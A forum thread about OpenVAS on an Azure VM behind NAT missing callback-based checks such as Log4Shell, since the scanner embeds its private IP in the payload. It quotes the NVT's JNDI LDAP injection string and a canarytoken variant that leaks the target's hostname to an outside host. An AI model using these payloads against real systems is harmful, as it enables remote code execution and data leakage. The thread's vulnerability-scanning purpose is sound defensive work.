Openvas is not able to detect vulnerabilities that need callback when deployed in Cloud (at least in Azure)

Hi all,

I have deployed OpenVAS in a VPS on Azure. All VPS on Azure are not able to get the public IP assigned to the network interface cuz it is a resource and the network interface always get the private IP that Azure assigns, so it is working as a NAT.

The problem with this deployment in Azure is that OpenVAS is not able to detect vulnerabilities that have a callback as a check, for instance, log4shell/log4j NVTs… This is because the payload that Greenbone NVTs are building is the following one:
payload = “${jndi:ldap://” + ownip + “:” + rnd_port + “/a}”;

So the ownip is the internal IP in Azure VPS cuz the operating system does not have the public IP directly assigned to the network interface. I have contacted to Azure and they do not have in the roadmap to add this feature into Azure Network Configurations (assign the Public IP directly to the NIC).

Some people in the forum have proposed to update manually the NVTs with a canarytoken (for instance: payload = “${jndi:ldap://x${hostName}.abc.abcde12345.canarytokens.com/a}”; but that is an ardous task, you have to monitor all the old and new NVTs and change every payload each time the feed is updated… It does not make sense…

I assume this will also happen when deployed in a container and the container has a NAT configuration…

I do not know if someone has faced this problem anytime and if there is a solution that it is not to change to another VPS in other cloud provider that allow to assing the public IP directly to the NIC (without NAT).

Thanks in advance,
Cheers :slight_smile:

How is it defining “ownip” ? Would this be a problem in a container as well, where the IP of the container would not be reachable from off the host?

“ownip” is the IP that has the NIC that your OpenVAS scanner is using… I believe it is retrieved with ‘ifconfig’ or ‘ip’ commands… So it is also a problem in a container unless you are able to setup the public-facing IP to your container (e.g., via network_bridge in LXC).